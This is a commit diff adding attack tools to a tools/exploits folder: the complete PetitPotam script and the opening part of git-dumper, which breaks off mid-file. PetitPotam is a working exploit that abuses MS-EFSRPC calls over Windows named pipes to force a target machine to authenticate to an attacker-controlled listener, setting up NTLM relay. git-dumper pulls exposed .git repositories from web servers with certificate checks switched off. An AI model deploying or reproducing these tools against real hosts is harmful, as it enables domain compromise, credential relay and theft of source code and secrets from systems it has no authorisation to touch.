Repository restructuring
This commit is contained in:
461
tools/exploits/PetitPotam.py
Executable file
461
tools/exploits/PetitPotam.py
Executable file
@@ -0,0 +1,461 @@
|
||||
#!/usr/bin/env python
|
||||
#
|
||||
# Author: GILLES Lionel aka topotam (@topotam77)
|
||||
#
|
||||
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo) my friends!
|
||||
# "Most of" the code stolen from dementor.py from @3xocyte ;)
|
||||
|
||||
|
||||
import sys
|
||||
import argparse
|
||||
|
||||
from impacket import system_errors
|
||||
from impacket.dcerpc.v5 import transport
|
||||
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
|
||||
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR
|
||||
from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
|
||||
from impacket.uuid import uuidtup_to_bin
|
||||
|
||||
|
||||
show_banner = '''
|
||||
|
||||
___ _ _ _ ___ _
|
||||
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
|
||||
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
|
||||
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
|
||||
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
|
||||
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
|
||||
|
||||
PoC to elicit machine account authentication via some MS-EFSRPC functions
|
||||
by topotam (@topotam77)
|
||||
|
||||
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
|
||||
|
||||
|
||||
'''
|
||||
|
||||
class DCERPCSessionError(DCERPCException):
|
||||
def __init__(self, error_string=None, error_code=None, packet=None):
|
||||
DCERPCException.__init__(self, error_string, error_code, packet)
|
||||
|
||||
def __str__( self ):
|
||||
key = self.error_code
|
||||
if key in system_errors.ERROR_MESSAGES:
|
||||
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
|
||||
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
|
||||
return 'EFSR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
|
||||
else:
|
||||
return 'EFSR SessionError: unknown error code: 0x%x' % self.error_code
|
||||
|
||||
|
||||
################################################################################
|
||||
# STRUCTURES
|
||||
################################################################################
|
||||
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
|
||||
align = 1
|
||||
structure = (
|
||||
('Data', '20s'),
|
||||
)
|
||||
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
|
||||
align = 1
|
||||
structure = (
|
||||
('Data', '20s'),
|
||||
)
|
||||
class EFS_EXIM_PIPE(NDRSTRUCT):
|
||||
align = 1
|
||||
structure = (
|
||||
('Data', ':'),
|
||||
)
|
||||
class EFS_HASH_BLOB(NDRSTRUCT):
|
||||
|
||||
structure = (
|
||||
('Data', DWORD),
|
||||
('cbData', PCHAR),
|
||||
)
|
||||
class EFS_RPC_BLOB(NDRSTRUCT):
|
||||
|
||||
structure = (
|
||||
('Data', DWORD),
|
||||
('cbData', PCHAR),
|
||||
)
|
||||
|
||||
class EFS_CERTIFICATE_BLOB(NDRSTRUCT):
|
||||
structure = (
|
||||
('Type', DWORD),
|
||||
('Data', DWORD),
|
||||
('cbData', PCHAR),
|
||||
)
|
||||
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
|
||||
structure = (
|
||||
('Lenght', DWORD),
|
||||
('SID', RPC_SID),
|
||||
('Hash', EFS_HASH_BLOB),
|
||||
('Display', LPWSTR),
|
||||
)
|
||||
class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
|
||||
structure = (
|
||||
('Lenght', DWORD),
|
||||
('SID', RPC_SID),
|
||||
('Hash', EFS_CERTIFICATE_BLOB),
|
||||
|
||||
)
|
||||
class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
|
||||
align = 1
|
||||
structure = (
|
||||
('Cert', DWORD),
|
||||
('Users', ENCRYPTION_CERTIFICATE_HASH),
|
||||
)
|
||||
class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
|
||||
structure = (
|
||||
('Type', DWORD),
|
||||
('HASH', ENCRYPTION_CERTIFICATE_HASH_LIST),
|
||||
('Certif', ENCRYPTION_CERTIFICATE),
|
||||
('Blob', EFS_RPC_BLOB),
|
||||
)
|
||||
class EFS_RPC_BLOB(NDRSTRUCT):
|
||||
structure = (
|
||||
('Data', DWORD),
|
||||
('cbData', PCHAR),
|
||||
)
|
||||
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
|
||||
align = 1
|
||||
structure = (
|
||||
('Data', ':'),
|
||||
)
|
||||
|
||||
################################################################################
|
||||
# RPC CALLS
|
||||
################################################################################
|
||||
class EfsRpcOpenFileRaw(NDRCALL):
|
||||
opnum = 0
|
||||
structure = (
|
||||
('fileName', WSTR),
|
||||
('Flag', ULONG),
|
||||
)
|
||||
|
||||
class EfsRpcOpenFileRawResponse(NDRCALL):
|
||||
structure = (
|
||||
('hContext', EXIMPORT_CONTEXT_HANDLE),
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
class EfsRpcEncryptFileSrv(NDRCALL):
|
||||
opnum = 4
|
||||
structure = (
|
||||
('FileName', WSTR),
|
||||
)
|
||||
|
||||
class EfsRpcEncryptFileSrvResponse(NDRCALL):
|
||||
structure = (
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
class EfsRpcDecryptFileSrv(NDRCALL):
|
||||
opnum = 5
|
||||
structure = (
|
||||
('FileName', WSTR),
|
||||
('Flag', ULONG),
|
||||
)
|
||||
|
||||
class EfsRpcDecryptFileSrvResponse(NDRCALL):
|
||||
structure = (
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
class EfsRpcQueryUsersOnFile(NDRCALL):
|
||||
opnum = 6
|
||||
structure = (
|
||||
('FileName', WSTR),
|
||||
|
||||
)
|
||||
class EfsRpcQueryUsersOnFileResponse(NDRCALL):
|
||||
structure = (
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
class EfsRpcQueryRecoveryAgents(NDRCALL):
|
||||
opnum = 7
|
||||
structure = (
|
||||
('FileName', WSTR),
|
||||
|
||||
)
|
||||
class EfsRpcQueryRecoveryAgentsResponse(NDRCALL):
|
||||
structure = (
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
class EfsRpcRemoveUsersFromFile(NDRCALL):
|
||||
opnum = 8
|
||||
structure = (
|
||||
('FileName', WSTR),
|
||||
('Users', ENCRYPTION_CERTIFICATE_HASH_LIST)
|
||||
|
||||
)
|
||||
class EfsRpcRemoveUsersFromFileResponse(NDRCALL):
|
||||
structure = (
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
class EfsRpcAddUsersToFile(NDRCALL):
|
||||
opnum = 9
|
||||
structure = (
|
||||
('FileName', WSTR),
|
||||
('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST)
|
||||
|
||||
)
|
||||
class EfsRpcAddUsersToFileResponse(NDRCALL):
|
||||
structure = (
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
class EfsRpcFileKeyInfo(NDRCALL):
|
||||
opnum = 12
|
||||
structure = (
|
||||
('FileName', WSTR),
|
||||
('infoClass', DWORD),
|
||||
)
|
||||
class EfsRpcFileKeyInfoResponse(NDRCALL):
|
||||
structure = (
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
class EfsRpcDuplicateEncryptionInfoFile(NDRCALL):
|
||||
opnum = 13
|
||||
structure = (
|
||||
('SrcFileName', WSTR),
|
||||
('DestFileName', WSTR),
|
||||
('dwCreationDisposition', DWORD),
|
||||
('dwAttributes', DWORD),
|
||||
('RelativeSD', EFS_RPC_BLOB),
|
||||
('bInheritHandle', BOOL),
|
||||
)
|
||||
|
||||
class EfsRpcDuplicateEncryptionInfoFileResponse(NDRCALL):
|
||||
structure = (
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
class EfsRpcAddUsersToFileEx(NDRCALL):
|
||||
opnum = 15
|
||||
structure = (
|
||||
('dwFlags', DWORD),
|
||||
('Reserved', EFS_RPC_BLOB),
|
||||
('FileName', WSTR),
|
||||
('dwAttributes', DWORD),
|
||||
('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST),
|
||||
)
|
||||
|
||||
class EfsRpcAddUsersToFileExResponse(NDRCALL):
|
||||
structure = (
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
class EfsRpcFileKeyInfoEx(NDRCALL):
|
||||
opnum = 16
|
||||
structure = (
|
||||
('dwFileKeyInfoFlags', DWORD),
|
||||
('Reserved', EFS_RPC_BLOB),
|
||||
('FileName', WSTR),
|
||||
('InfoClass', DWORD),
|
||||
)
|
||||
class EfsRpcFileKeyInfoExResponse(NDRCALL):
|
||||
structure = (
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
class EfsRpcGetEncryptedFileMetadata(NDRCALL):
|
||||
opnum = 18
|
||||
structure = (
|
||||
('FileName', WSTR),
|
||||
)
|
||||
class EfsRpcGetEncryptedFileMetadataResponse(NDRCALL):
|
||||
structure = (
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
class EfsRpcSetEncryptedFileMetadata(NDRCALL):
|
||||
opnum = 19
|
||||
structure = (
|
||||
('FileName', WSTR),
|
||||
('OldEfsStreamBlob', EFS_RPC_BLOB),
|
||||
('NewEfsStreamBlob', EFS_RPC_BLOB),
|
||||
('NewEfsSignature', ENCRYPTED_FILE_METADATA_SIGNATURE),
|
||||
)
|
||||
class EfsRpcSetEncryptedFileMetadataResponse(NDRCALL):
|
||||
structure = (
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
class EfsRpcEncryptFileExSrv(NDRCALL):
|
||||
opnum = 21
|
||||
structure = (
|
||||
('FileName', WSTR),
|
||||
('ProtectorDescriptor', WSTR),
|
||||
('Flags', ULONG),
|
||||
)
|
||||
class EfsRpcEncryptFileExSrvResponse(NDRCALL):
|
||||
structure = (
|
||||
('ErrorCode', ULONG),
|
||||
)
|
||||
#class EfsRpcQueryProtectors(NDRCALL):
|
||||
# opnum = 21
|
||||
# structure = (
|
||||
# ('FileName', WSTR),
|
||||
# ('ppProtectorList', PENCRYPTION_PROTECTOR_LIST),
|
||||
# )
|
||||
#class EfsRpcQueryProtectorsResponse(NDRCALL):
|
||||
# structure = (
|
||||
# ('ErrorCode', ULONG),
|
||||
# )
|
||||
|
||||
################################################################################
|
||||
# OPNUMs and their corresponding structures
|
||||
################################################################################
|
||||
OPNUMS = {
|
||||
0 : (EfsRpcOpenFileRaw, EfsRpcOpenFileRawResponse),
|
||||
4 : (EfsRpcEncryptFileSrv, EfsRpcEncryptFileSrvResponse),
|
||||
5 : (EfsRpcDecryptFileSrv, EfsRpcDecryptFileSrvResponse),
|
||||
6 : (EfsRpcQueryUsersOnFile, EfsRpcQueryUsersOnFileResponse),
|
||||
7 : (EfsRpcQueryRecoveryAgents, EfsRpcQueryRecoveryAgentsResponse),
|
||||
8 : (EfsRpcRemoveUsersFromFile, EfsRpcRemoveUsersFromFileResponse),
|
||||
9 : (EfsRpcAddUsersToFile, EfsRpcAddUsersToFileResponse),
|
||||
12 : (EfsRpcFileKeyInfo, EfsRpcFileKeyInfoResponse),
|
||||
13 : (EfsRpcDuplicateEncryptionInfoFile, EfsRpcDuplicateEncryptionInfoFileResponse),
|
||||
15 : (EfsRpcAddUsersToFileEx, EfsRpcAddUsersToFileExResponse),
|
||||
16 : (EfsRpcFileKeyInfoEx, EfsRpcFileKeyInfoExResponse),
|
||||
18 : (EfsRpcGetEncryptedFileMetadata, EfsRpcGetEncryptedFileMetadataResponse),
|
||||
19 : (EfsRpcSetEncryptedFileMetadata, EfsRpcSetEncryptedFileMetadataResponse),
|
||||
21 : (EfsRpcEncryptFileExSrv, EfsRpcEncryptFileExSrvResponse),
|
||||
# 22 : (EfsRpcQueryProtectors, EfsRpcQueryProtectorsResponse),
|
||||
}
|
||||
|
||||
class CoerceAuth():
|
||||
def connect(self, username, password, domain, lmhash, nthash, target, pipe, doKerberos, dcHost, targetIp):
|
||||
binding_params = {
|
||||
'lsarpc': {
|
||||
'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
|
||||
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
|
||||
},
|
||||
'efsr': {
|
||||
'stringBinding': r'ncacn_np:%s[\PIPE\efsrpc]' % target,
|
||||
'MSRPC_UUID_EFSR': ('df1941c5-fe89-4e79-bf10-463657acf44d', '1.0')
|
||||
},
|
||||
'samr': {
|
||||
'stringBinding': r'ncacn_np:%s[\PIPE\samr]' % target,
|
||||
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
|
||||
},
|
||||
'lsass': {
|
||||
'stringBinding': r'ncacn_np:%s[\PIPE\lsass]' % target,
|
||||
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
|
||||
},
|
||||
'netlogon': {
|
||||
'stringBinding': r'ncacn_np:%s[\PIPE\netlogon]' % target,
|
||||
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
|
||||
},
|
||||
}
|
||||
rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
|
||||
if hasattr(rpctransport, 'set_credentials'):
|
||||
rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
|
||||
|
||||
if doKerberos:
|
||||
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
||||
if targetIp:
|
||||
rpctransport.setRemoteHost(targetIp)
|
||||
|
||||
dce = rpctransport.get_dce_rpc()
|
||||
dce.set_auth_type(RPC_C_AUTHN_WINNT)
|
||||
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
||||
print("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
|
||||
try:
|
||||
dce.connect()
|
||||
except Exception as e:
|
||||
print("Something went wrong, check error status => %s" % str(e))
|
||||
#sys.exit()
|
||||
return
|
||||
print("[+] Connected!")
|
||||
print("[+] Binding to %s" % binding_params[pipe]['MSRPC_UUID_EFSR'][0])
|
||||
try:
|
||||
dce.bind(uuidtup_to_bin(binding_params[pipe]['MSRPC_UUID_EFSR']))
|
||||
except Exception as e:
|
||||
print("Something went wrong, check error status => %s" % str(e))
|
||||
#sys.exit()
|
||||
return
|
||||
print("[+] Successfully bound!")
|
||||
return dce
|
||||
|
||||
def EfsRpcOpenFileRaw(self, dce, listener):
|
||||
print("[-] Sending EfsRpcOpenFileRaw!")
|
||||
try:
|
||||
request = EfsRpcOpenFileRaw()
|
||||
request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
|
||||
request['Flag'] = 0
|
||||
#request.dump()
|
||||
resp = dce.request(request)
|
||||
|
||||
except Exception as e:
|
||||
if str(e).find('ERROR_BAD_NETPATH') >= 0:
|
||||
print('[+] Got expected ERROR_BAD_NETPATH exception!!')
|
||||
print('[+] Attack worked!')
|
||||
#sys.exit()
|
||||
return None
|
||||
if str(e).find('rpc_s_access_denied') >= 0:
|
||||
print('[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!')
|
||||
print('[+] OK! Using unpatched function!')
|
||||
print("[-] Sending EfsRpcEncryptFileSrv!")
|
||||
try:
|
||||
request = EfsRpcEncryptFileSrv()
|
||||
request['FileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
|
||||
resp = dce.request(request)
|
||||
except Exception as e:
|
||||
if str(e).find('ERROR_BAD_NETPATH') >= 0:
|
||||
print('[+] Got expected ERROR_BAD_NETPATH exception!!')
|
||||
print('[+] Attack worked!')
|
||||
pass
|
||||
else:
|
||||
print("Something went wrong, check error status => %s" % str(e))
|
||||
return None
|
||||
#sys.exit()
|
||||
|
||||
else:
|
||||
print("Something went wrong, check error status => %s" % str(e))
|
||||
return None
|
||||
#sys.exit()
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(add_help = True, description = "PetitPotam - rough PoC to connect to lsarpc and elicit machine account authentication via MS-EFSRPC EfsRpcOpenFileRaw()")
|
||||
parser.add_argument('-u', '--username', action="store", default='', help='valid username')
|
||||
parser.add_argument('-p', '--password', action="store", default='', help='valid password (if omitted, it will be asked unless -no-pass)')
|
||||
parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name')
|
||||
parser.add_argument('-hashes', action="store", metavar="[LMHASH]:NTHASH", help='NT/LM hashes (LM hash can be empty)')
|
||||
|
||||
parser.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
|
||||
parser.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
|
||||
'(KRB5CCNAME) based on target parameters. If valid credentials '
|
||||
'cannot be found, it will use the ones specified in the command '
|
||||
'line')
|
||||
parser.add_argument('-dc-ip', action="store", metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter')
|
||||
parser.add_argument('-target-ip', action='store', metavar="ip address",
|
||||
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
|
||||
'This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it')
|
||||
|
||||
parser.add_argument('-pipe', action="store", choices=['efsr', 'lsarpc', 'samr', 'netlogon', 'lsass', 'all'], default='lsarpc', help='Named pipe to use (default: lsarpc) or all')
|
||||
parser.add_argument('listener', help='ip address or hostname of listener')
|
||||
parser.add_argument('target', help='ip address or hostname of target')
|
||||
options = parser.parse_args()
|
||||
|
||||
if options.hashes is not None:
|
||||
lmhash, nthash = options.hashes.split(':')
|
||||
else:
|
||||
lmhash = ''
|
||||
nthash = ''
|
||||
|
||||
print(show_banner)
|
||||
|
||||
if options.password == '' and options.username != '' and options.hashes is None and options.no_pass is not True:
|
||||
from getpass import getpass
|
||||
options.password = getpass("Password:")
|
||||
|
||||
plop = CoerceAuth()
|
||||
|
||||
if options.pipe == "all":
|
||||
all_pipes = ['efsr', 'lsarpc', 'samr', 'netlogon', 'lsass']
|
||||
else:
|
||||
all_pipes = [options.pipe]
|
||||
|
||||
for all_pipe in all_pipes:
|
||||
print("Trying pipe", all_pipe)
|
||||
dce = plop.connect(username=options.username, password=options.password, domain=options.domain, lmhash=lmhash, nthash=nthash, target=options.target, pipe=all_pipe, doKerberos=options.k, dcHost=options.dc_ip, targetIp=options.target_ip)
|
||||
if dce is not None:
|
||||
plop.EfsRpcOpenFileRaw(dce, options.listener)
|
||||
dce.disconnect()
|
||||
sys.exit()
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
604
tools/exploits/git-dumper.py
Executable file
604
tools/exploits/git-dumper.py
Executable file
@@ -0,0 +1,604 @@
|
||||
#!/usr/bin/env python3
|
||||
from contextlib import closing
|
||||
import argparse
|
||||
import multiprocessing
|
||||
import os
|
||||
import os.path
|
||||
import re
|
||||
import socket
|
||||
import subprocess
|
||||
import sys
|
||||
import urllib.parse
|
||||
import urllib3
|
||||
|
||||
import bs4
|
||||
import dulwich.index
|
||||
import dulwich.objects
|
||||
import dulwich.pack
|
||||
import requests
|
||||
import socks
|
||||
|
||||
USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
|
||||
|
||||
def printf(fmt, *args, file=sys.stdout):
|
||||
if args:
|
||||
fmt = fmt % args
|
||||
|
||||
file.write(fmt)
|
||||
file.flush()
|
||||
|
||||
|
||||
def is_html(response):
|
||||
''' Return True if the response is a HTML webpage '''
|
||||
return '<html>' in response.text
|
||||
|
||||
|
||||
def get_indexed_files(response):
|
||||
''' Return all the files in the directory index webpage '''
|
||||
html = bs4.BeautifulSoup(response.text, 'html.parser')
|
||||
files = []
|
||||
|
||||
for link in html.find_all('a'):
|
||||
url = urllib.parse.urlparse(link.get('href'))
|
||||
|
||||
if (url.path and
|
||||
url.path != '.' and
|
||||
url.path != '..' and
|
||||
url.path != './' and
|
||||
url.path != '../' and
|
||||
not url.path.startswith('/') and
|
||||
not url.scheme and
|
||||
not url.netloc):
|
||||
files.append(url.path)
|
||||
|
||||
return files
|
||||
|
||||
|
||||
def create_intermediate_dirs(path):
|
||||
''' Create intermediate directories, if necessary '''
|
||||
|
||||
dirname, basename = os.path.split(path)
|
||||
|
||||
if dirname and not os.path.exists(dirname):
|
||||
try:
|
||||
os.makedirs(dirname)
|
||||
except FileExistsError:
|
||||
pass # race condition
|
||||
|
||||
|
||||
def get_referenced_sha1(obj_file):
|
||||
''' Return all the referenced SHA1 in the given object file '''
|
||||
objs = []
|
||||
|
||||
if isinstance(obj_file, dulwich.objects.Commit):
|
||||
objs.append(obj_file.tree.decode())
|
||||
|
||||
for parent in obj_file.parents:
|
||||
objs.append(parent.decode())
|
||||
elif isinstance(obj_file, dulwich.objects.Tree):
|
||||
for item in obj_file.iteritems():
|
||||
objs.append(item.sha.decode())
|
||||
elif isinstance(obj_file, dulwich.objects.Blob):
|
||||
pass
|
||||
else:
|
||||
printf('error: unexpected object type: %r\n' % obj_file, file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
return objs
|
||||
|
||||
|
||||
class Worker(multiprocessing.Process):
|
||||
''' Worker for process_tasks '''
|
||||
|
||||
def __init__(self, pending_tasks, tasks_done, args):
|
||||
super().__init__()
|
||||
self.daemon = True
|
||||
self.pending_tasks = pending_tasks
|
||||
self.tasks_done = tasks_done
|
||||
self.args = args
|
||||
|
||||
def run(self):
|
||||
# initialize process
|
||||
self.init(*self.args)
|
||||
|
||||
# fetch and do tasks
|
||||
while True:
|
||||
task = self.pending_tasks.get(block=True)
|
||||
|
||||
if task is None: # end signal
|
||||
return
|
||||
|
||||
result = self.do_task(task, *self.args)
|
||||
|
||||
assert isinstance(result, list), 'do_task() should return a list of tasks'
|
||||
|
||||
self.tasks_done.put(result)
|
||||
|
||||
def init(self, *args):
|
||||
raise NotImplementedError
|
||||
|
||||
def do_task(self, task, *args):
|
||||
raise NotImplementedError
|
||||
|
||||
|
||||
def process_tasks(initial_tasks, worker, jobs, args=(), tasks_done=None):
|
||||
''' Process tasks in parallel '''
|
||||
|
||||
if not initial_tasks:
|
||||
return
|
||||
|
||||
tasks_seen = set(tasks_done) if tasks_done else set()
|
||||
pending_tasks = multiprocessing.Queue()
|
||||
tasks_done = multiprocessing.Queue()
|
||||
num_pending_tasks = 0
|
||||
|
||||
# add all initial tasks in the queue
|
||||
for task in initial_tasks:
|
||||
assert task is not None
|
||||
|
||||
if task not in tasks_seen:
|
||||
pending_tasks.put(task)
|
||||
num_pending_tasks += 1
|
||||
tasks_seen.add(task)
|
||||
|
||||
# initialize processes
|
||||
processes = [worker(pending_tasks, tasks_done, args) for _ in range(jobs)]
|
||||
|
||||
# launch them all
|
||||
for p in processes:
|
||||
p.start()
|
||||
|
||||
# collect task results
|
||||
while num_pending_tasks > 0:
|
||||
task_result = tasks_done.get(block=True)
|
||||
num_pending_tasks -= 1
|
||||
|
||||
for task in task_result:
|
||||
assert task is not None
|
||||
|
||||
if task not in tasks_seen:
|
||||
pending_tasks.put(task)
|
||||
num_pending_tasks += 1
|
||||
tasks_seen.add(task)
|
||||
|
||||
# send termination signal (task=None)
|
||||
for _ in range(jobs):
|
||||
pending_tasks.put(None)
|
||||
|
||||
# join all
|
||||
for p in processes:
|
||||
p.join()
|
||||
|
||||
|
||||
class DownloadWorker(Worker):
|
||||
''' Download a list of files '''
|
||||
|
||||
def init(self, url, directory, retry, timeout, follow_redirects=False, module=None):
|
||||
self.session = requests.Session()
|
||||
self.session.verify = False
|
||||
self.session.mount(url, requests.adapters.HTTPAdapter(max_retries=retry))
|
||||
self.module = module
|
||||
|
||||
def do_task(self, filepath, url, directory, retry, timeout, follow_redirects=False, module=None):
|
||||
with closing(self.session.get('%s/%s' % (url, filepath),
|
||||
allow_redirects=follow_redirects,
|
||||
stream=True,
|
||||
timeout=timeout,
|
||||
headers={"User-Agent": USER_AGENT})) as response:
|
||||
printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)
|
||||
|
||||
if response.status_code != 200:
|
||||
return []
|
||||
|
||||
abspath = os.path.abspath(os.path.join(directory, filepath))
|
||||
create_intermediate_dirs(abspath)
|
||||
|
||||
# write file
|
||||
with open(abspath, 'wb') as f:
|
||||
for chunk in response.iter_content(4096):
|
||||
f.write(chunk)
|
||||
|
||||
return []
|
||||
|
||||
|
||||
class RecursiveDownloadWorker(DownloadWorker):
|
||||
''' Download a directory recursively '''
|
||||
|
||||
def do_task(self, filepath, url, directory, retry, timeout, follow_redirects=False):
|
||||
with closing(self.session.get('%s/%s' % (url, filepath),
|
||||
allow_redirects=follow_redirects,
|
||||
stream=True,
|
||||
timeout=timeout,
|
||||
headers={"User-Agent": USER_AGENT})) as response:
|
||||
printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)
|
||||
|
||||
if (response.status_code in (301, 302) and
|
||||
'Location' in response.headers and
|
||||
response.headers['Location'].endswith(filepath + '/')):
|
||||
return [filepath + '/']
|
||||
|
||||
if response.status_code != 200:
|
||||
return []
|
||||
|
||||
if filepath.endswith('/'): # directory index
|
||||
assert is_html(response)
|
||||
|
||||
return [filepath + filename for filename in get_indexed_files(response)]
|
||||
else: # file
|
||||
abspath = os.path.abspath(os.path.join(directory, filepath))
|
||||
create_intermediate_dirs(abspath)
|
||||
|
||||
# write file
|
||||
with open(abspath, 'wb') as f:
|
||||
for chunk in response.iter_content(4096):
|
||||
f.write(chunk)
|
||||
|
||||
return []
|
||||
|
||||
|
||||
class FindRefsWorker(DownloadWorker):
|
||||
''' Find refs/ '''
|
||||
|
||||
def do_task(self, filepath, url, directory, retry, timeout, follow_redirects=False, module=None):
|
||||
response = self.session.get('%s/%s' % (url, filepath),
|
||||
allow_redirects=follow_redirects,
|
||||
timeout=timeout,
|
||||
headers={"User-Agent": USER_AGENT})
|
||||
printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)
|
||||
|
||||
if response.status_code != 200:
|
||||
return []
|
||||
|
||||
abspath = os.path.abspath(os.path.join(directory, filepath))
|
||||
create_intermediate_dirs(abspath)
|
||||
|
||||
# write file
|
||||
with open(abspath, 'w') as f:
|
||||
f.write(response.text)
|
||||
|
||||
# find refs
|
||||
tasks = []
|
||||
|
||||
# module = ".git/" if not url.endswith("/modules") else ""
|
||||
|
||||
for ref in re.findall(r'(refs(/[a-zA-Z0-9\-\.\_\*]+)+)', response.text):
|
||||
ref = ref[0]
|
||||
if not ref.endswith('*'):
|
||||
tasks.append(self.module + '/%s' % ref)
|
||||
tasks.append(self.module + '/logs/%s' % ref)
|
||||
|
||||
return tasks
|
||||
|
||||
|
||||
class FindObjectsWorker(DownloadWorker):
|
||||
''' Find objects '''
|
||||
|
||||
def do_task(self, obj, url, directory, retry, timeout, follow_redirects, module):
|
||||
# module = ".git" if not url.endswith("/modules") else ""
|
||||
filepath = '%s/objects/%s/%s' % (self.module, obj[:2], obj[2:])
|
||||
response = self.session.get('%s/%s' % (url, filepath),
|
||||
allow_redirects=follow_redirects,
|
||||
timeout=timeout,
|
||||
headers={"User-Agent": USER_AGENT})
|
||||
printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)
|
||||
|
||||
if response.status_code != 200:
|
||||
return []
|
||||
|
||||
abspath = os.path.abspath(os.path.join(directory, filepath))
|
||||
create_intermediate_dirs(abspath)
|
||||
|
||||
# write file
|
||||
with open(abspath, 'wb') as f:
|
||||
f.write(response.content)
|
||||
|
||||
try:
|
||||
# parse object file to find other objects
|
||||
obj_file = dulwich.objects.ShaFile.from_path(abspath)
|
||||
return get_referenced_sha1(obj_file)
|
||||
except:
|
||||
print("[-] Error parsing:", filepath)
|
||||
os.remove(abspath)
|
||||
return []
|
||||
|
||||
|
||||
def fetch_git(url, directory, jobs, retry, timeout, follow_redirects, module=".git"):
|
||||
''' Dump a git repository into the output directory '''
|
||||
|
||||
assert os.path.isdir(directory), '%s is not a directory' % directory
|
||||
|
||||
if module == ".git":
|
||||
assert not os.listdir(directory), '%s is not empty' % directory
|
||||
assert jobs >= 1, 'invalid number of jobs'
|
||||
assert retry >= 1, 'invalid number of retries'
|
||||
assert timeout >= 1, 'invalid timeout'
|
||||
|
||||
# find base url
|
||||
if not url.startswith("http://") and not url.startswith("https://"):
|
||||
url = "http://" + url
|
||||
|
||||
url = url.rstrip('/')
|
||||
if url.endswith('HEAD'):
|
||||
url = url[:-4]
|
||||
url = url.rstrip('/')
|
||||
if url.endswith('.git'):
|
||||
url = url[:-4]
|
||||
url = url.rstrip('/')
|
||||
|
||||
# check for /.git/HEAD
|
||||
printf('[-] Testing %s/%s/HEAD ', url, module)
|
||||
response = requests.get('%s/%s/HEAD' % (url, module), verify=False, allow_redirects=follow_redirects, headers={"User-Agent": USER_AGENT})
|
||||
printf('[%d]\n', response.status_code)
|
||||
|
||||
if response.status_code != 200:
|
||||
printf('error: %s/%s/HEAD does not exist\n', url, module, file=sys.stderr)
|
||||
return 1
|
||||
# elif not response.text.startswith('ref:'):
|
||||
# printf('error: %s/.git/HEAD is not a git HEAD file\n', url, file=sys.stderr)
|
||||
# return 1
|
||||
|
||||
# check for directory listing
|
||||
